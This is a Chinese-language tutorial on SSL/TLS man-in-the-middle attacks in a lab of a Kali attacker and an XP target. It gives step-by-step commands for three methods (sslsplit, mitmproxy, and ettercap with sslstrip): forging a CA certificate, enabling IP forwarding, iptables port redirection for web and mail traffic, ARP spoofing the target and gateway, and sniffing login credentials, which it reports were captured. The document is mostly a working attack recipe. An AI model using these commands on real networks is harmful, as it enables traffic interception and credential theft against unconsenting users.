SSL/TLS中间人攻击
准备:kali、xp
kali ip:192.168.14.157
目标ip:192.168.14.158
目标网关:192.168.14.2
使用工具:ettercap、sslstrip、arpspoof、 Mitmproxy、sslsplit
下面使用三种方法,但只有第三种方法会有图文演示。
一、sslsplit+arpspoof
(1)简介
透明SSL中间人攻击工具
对客户端伪装成服务器,对服务器伪装成普通客户端
伪装服务器需要伪造证书,需要现在本地生成伪造证书
支持 SSL 加密的 SMTP、POP3、FTP等通信中间人攻击
(2)利用openssl 生成证书私钥
openssl genrsa -out ca.key 2048
(3)利用私钥签名生成证书
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CN
State or Province Name (full name) [Some-State]:jilin
Locality Name (eg, city) []:changchun
Organization Name (eg, company) [Internet Widgits Pty Ltd]:alibaba
Organizational Unit Name (eg, section) []:ali
Common Name (e.g. server FQDN or YOUR name) []:alibaba
Email Address []:123456@163.com
(4)攻击者开启路由功能
第一种修改的方法:sysctl -w net.ipv4.ip_forward=1
第二种修改的方法:
vim /etc/sysctl.conf
net.ipv4.ip_forward=1
(5)配置 iptables 规则,简单来说就是将加密浏览和不加密的流量重定向到指定端口
# 查看规则
root@kali:~# iptables -t nat -L -n
# 清空规则
root@kali:~# iptables -t nat -F
# 查看 80 和 443 端口是否有占用
root@kali:~# netstat -tulnp | grep 80
root@kali:~# netstat -tulnp | grep 443
注意: PREROUTING:路由生效之前执行规则
# 发给 80 端口的流量转发给 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
# 发给 443 端口的流量转发给 8443
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
# MSA:邮件提交代理
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
# SMTPS:简单邮件传输
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
# IMAPS:接收邮件
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443
# POP3S:邮件传输
iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443
#再一次查看规则
iptables -t nat -L -n
(6)kali 实现 arp 欺骗
root@kali:~# arpspoof -i eth0 -t 192.168.14.158 -r 192.168.14.2
(7)启动 sslsplit 进行攻击
1.创建目录和文件
root@kali:~# mkdir test
root@kali:~# mkdir /root/test/logdir
2.开启sllsplit侦听 8080 和 8443
sslsplit -D -l connect.log -j /root/test -S /root/test/logdir -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
二、Mitmproxy+arpspoof
Mitmproxy也是和SSLsplit差不多的工具。
(1)kali 实现 arp 欺骗
root@kali:~# arpspoof -i eth0 -t 10.10.10.133 -r 10.10.10.2
(2)添加防火墙规则
# Mitmproxy 只支持在 8080 侦听
iptables -t nat -F
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8080
(3)mitmproxy 启动
mitmproxy -T --host -w mitmproxy.log
三、ettercap+arpspoof+sllstrip
(1)开启流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward
(2)端口转发,10000为sslstrip的监听端口
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
(3)ARP欺骗
arpspoof -i eth0 -t 192.168.18.100 192.168.18.254
(4)开启sslstrip
sslstrip -a -k -f
(5)开启ettercap嗅探密码
ettercap -T -q -i eth0
(6)在xp上先测试HTTP登陆
用户名:bbbb
密码:test
下面信息显示嗅探成功
(7)在xp上测试HTTPS登陆
用户名:test
密码:test
下面信息显示嗅探成功
总结:如果你想查看在传输过程中更详细的信息可以使用前面两种方法,但是需要注意的是,前面两种方法使用伪造的证书加密数据,会被网站提醒证书错误,这样很容易攻击失败。
第三种方法的攻击思路:
ARP欺骗,使得攻击者能截获所有目标主机的网络流量;
攻击者利用用户对于地址栏中HTTPS与HTTP的疏忽,将所有的HTTPS连接都用HTTP来代替;
同时,与目标服务器建立正常的HTTPS连接;
由于HTTP通信是明文传输,攻击者能轻松实施嗅探。